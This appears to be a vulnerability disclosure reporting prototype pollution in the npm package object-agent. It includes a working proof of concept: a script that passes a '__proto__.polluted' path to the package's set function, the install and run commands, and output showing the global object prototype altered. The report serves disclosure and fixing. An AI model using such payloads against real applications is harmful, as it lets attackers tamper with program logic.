Prototype Pollution in darrenpaulwright/object-agent
Valid
Reported on
Jan 4th 2021
Description
object-agent
is vulnerable to Prototype Pollution
.
Proof of Concept
- Create the following PoC file:
// poc.js
import { set } from 'object-agent';
var obj = {}
console.log("Before : " + {}.polluted);
set(obj, '__proto__.polluted', 'Yes! Its Polluted');
console.log("After : " + {}.polluted);
- Execute the following commands in terminal:
npm i object-agent # Install affected module
node poc.js # Run the PoC
- Check the Output:
Before : undefined
After : Yes! Its Polluted
to join this conversation